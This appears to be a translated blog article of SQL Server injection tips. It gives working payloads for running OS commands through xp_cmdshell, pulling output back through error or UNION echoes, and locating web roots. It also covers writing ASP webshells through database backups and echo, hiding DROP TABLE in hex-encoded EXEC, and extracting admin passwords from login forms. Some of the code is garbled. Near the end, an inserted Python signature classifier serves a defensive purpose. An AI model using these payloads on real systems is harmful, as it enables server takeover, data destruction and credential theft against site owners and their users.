SQL Server Injection Tips

Source: Internet
Author: User
Tags: mssql, sql server, injection

I. When executing commands as the sa user, how do you get results faster?

    • There is a display bit
    • There is no display bit


In fact, the key here is not whether there is a display bit. EXEC master..xp_cmdshell 'systeminfo' produces many rows when its output is written into a table, and what we want is to pull all of those rows out at once, either through the display bit or through a single error message; so the key is to merge the multiple rows into one.


Method ①
BEGIN
IF EXISTS (Select table_name from Information_schema.Tables where Table_name='test_1') Drop Table test_1;
IF EXISTS (Select table_name from Information_schema.Tables where Table_name='test_2') Drop Table test_2;
Create TABLE Test_1 ([Output] [varchar]( +));
Insert Test_1 exec Master.Dbo.xp_cmdshell 'ipconfig /all';
DECLARE @result varchar(8000)
SET @result='~'
SELECT @result=@result+' '+Output from Test_1 where Output>''
SELECT @result as result into test_2;
SELECT Convert(int,(Select result from test_2));
END;

Analysis:

    • Statements 6 to 9 (DECLARE through SELECT ... into test_2) declare a temporary variable @result;
    • its initial value is set to '~'; the rows of test_1 are then read in sequence with the iteration condition Output>'', and each row is appended to the growing string with the pieces separated by a space, so that the whole output ends up in @result;
    • @result is then given the alias result and inserted into test_2;
    • finally the error echo is triggered: converting that string to int fails, and the error message carries the whole string.
      Ps:
    • MSSQL letter comparison is case-insensitive
    • MSSQL string comparison works the same way as strcmp() in C


Method ② (injection point test succeeded; test platform SQL Server 2008 - 10.0.1600.22 (X64))

    • Error-based: and (SELECT * from test_1 for XML PATH('')) =1--
    • Display-based: UNION Select 1,(SELECT * from Test_1 for XML PATH(''))--


II. How to quickly find the site directory (sa user)

    • sa user has been downgraded (privileges lowered)
    • sa user has not been downgraded


It is reasonable to distinguish the downgraded case from the non-downgraded one here. If privileges have not been lowered, they are high enough to read some of the configuration saved locally; if privileges have been lowered, you can use the dir command to search.


Method ① (privileges lowered – pro-test success):
CREATE TABLE test_1 ([output] [varchar]( +));
INSERT test_1 EXEC master.dbo.xp_cmdshell 'dir /s d:\web.config';
and (SELECT * from test_1 for XML PATH('')) =1 ;


Method ② (privileges not lowered – system – pro-test success):
CREATE TABLE test_1 ([output] [varchar]( +));
INSERT test_1 EXEC master.dbo.xp_cmdshell 'cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3svc/1/root';
and (SELECT * from test_1 for XML PATH('')) =1 ;


Method ③ (sa + system permission + IIS 7.0 / IIS 7.5):

%systemroot%\system32\inetsrv\appcmd.exe list site    -- lists the web sites
%systemroot%\system32\inetsrv\appcmd.exe list vdir    -- lists the physical path of each web site

Ps:
%systemroot% stands for C:\windows\


III. How to get a shell from the injection point
Method ① (differential backup) – pro-test success – does not require sa permission, so it can be tested at injection points without sa

IF EXISTS (Select table_name from Information_schema.Tables where Table_name='test_tmp') Drop Table test_tmp;
Backup Database Xfdata to Disk='D:\WebRoot\asp.bak';
Create Table [dbo].[Test_tmp] ([cmd] [image]);
Insert into Test_tmp (CMD) Values(0x3c25657865637574652872657175657374282261222929253e);
Backup Database Xfdata to disk='D:\WebRoot\asp.asp' with Differential,FORMAT;


Method ② (log backup – smaller file) – pro-test success – does not require sa permission, so it can be tested at injection points without sa
IF EXISTS (Select table_name from Information_schema.Tables where Table_name='test_tmp') Drop Table test_tmp;
Alter Database Xfdata Set RECOVERY Full;
Create Table Test_tmp (a image);
Backup Log Xfdata to Disk='D:\WebRoot\asp.bak' with Init;
Insert into Test_tmp (a) Values(0x3c25657865637574652872657175657374282261222929253eda);
Backup Log Xfdata to Disk='D:\webroot\123.asp';

Ps:

    • If the backup fails, it is probably a permission problem on the target directory; try a different directory.
    • If the table already exists the method fails, so first check whether the table exists and drop it if it does.


Method ③ (echo a one-line webshell) – sa permission + write permission for the current user – pro-test success
echo ^<%eval request("pass")%^>>d:\%d1%a7%b7%d6%cf%b5%cd%b3\webroot\Update.asp

Ps:

    • Because this is an injection point, pay attention to the encoding. In general the page encoding and the database encoding are consistent (if they are inconsistent ~~~ I give up). Here I use a Chinese path for the description.


IV. How to avoid using keywords like select
Method ①: hex obfuscation

; DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b as VARCHAR(4000)); EXEC(@S); --


V. At a login-form injection point, how to get the back-end password fastest
1' having 1=1--    # exposes the table name

1' group by username having 1=1--    # exposes the column name

# user_mess.account

# user_mess.pwd

1';Select/**/Convert(int,(Select/**/Top/**/1/**/Account/**/from/**/user_mess))--
1';Select/**/Convert(int,(Select/**/Top/**/1/**/pwd/**/from/**/user_mess/**/where/**/account='Admin'))--
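Added example, not code from the original article: a small Python normaliser and classifier that a defender can run over captured request parameters or SQL audit entries. It undoes the two evasions from sections IV and V (ASCII text hidden in 0x... literals and /**/ used as whitespace) before matching the statement shapes used throughout this page. The signature list, function names and sample inputs are constructed for this example.

```python
import re

# Signature list is an assumption for this example, drawn from the statement
# shapes on this page (xp_cmdshell, FOR XML PATH, BACKUP ... TO DISK, HAVING
# 1=1 enumeration, CONVERT(int,(SELECT ...)) error echo, EXEC(@var)).
SIGNATURES = {
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "for-xml-path echo": re.compile(r"\bfor\s+xml\s+path\s*\(", re.I),
    "backup-to-disk write": re.compile(r"\bbackup\s+(database|log)\b.*\bto\s+disk\s*=", re.I),
    "having/group-by enum": re.compile(r"\b(having|group\s+by)\b.*\b1\s*=\s*1", re.I),
    "convert-int error echo": re.compile(r"\bconvert\s*\(\s*int\s*,\s*\(\s*select\b", re.I),
    "exec of variable": re.compile(r"\bexec\s*\(\s*@\w+\s*\)", re.I),
    "drop table": re.compile(r"\bdrop\s+table\b", re.I),
}
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)\b")  # even-length 0x... literals
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)          # /**/ used as whitespace


def normalise(fragment: str) -> str:
    """Undo the evasions from sections IV and V: decode 0x... literals that are
    really ASCII text (they may hide DROP TABLE or SELECT), replace inline
    comments with a space, then collapse whitespace."""
    def decode(m):
        raw = bytes.fromhex(m.group(1))
        try:
            return raw.decode("ascii")
        except UnicodeDecodeError:
            return m.group(0)  # binary literal, not text: leave it untouched
    text = INLINE_COMMENT.sub(" ", fragment)
    text = HEX_LITERAL.sub(decode, text)
    return re.sub(r"\s+", " ", text).strip()


def classify(fragment: str) -> list:
    """Sorted names of every signature the normalised text matches."""
    text = normalise(fragment)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


# Constructed sample inputs: the first two are the page's own section IV and V
# payloads, the third is an ordinary query that must not be flagged.
SAMPLES = {
    "hex_obfuscated": "; DECLARE @S VARCHAR(4000) SET @S=CAST( "
                      "0x44524f50205441424c4520544d505f44423b as VARCHAR(4000)); EXEC (@S); --",
    "comment_whitespace": "1 ';Select/**/Convert(int,(Select/**/Top/**/1/**/"
                          "Account/**/from/**/user_mess))--",
    "benign": "SELECT name FROM products WHERE id = 42",
}

if __name__ == "__main__":
    for label, sql in SAMPLES.items():
        print(f"{label:20s} -> {classify(sql) or ['clean']}")
```

Running the block prints which signatures each sample triggers; the hex-obfuscated statement is only recognisable as DROP TABLE after the literal has been decoded.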


VI. Conclusion

This article was compiled a long time ago, so some parts may be wrong; I hope everyone can point them out. Also, if you have other tricks, share them so we can summarize them together.



I am really not used to the typesetting here; doing layout in markdown now feels a bit difficult, please don't flame me...
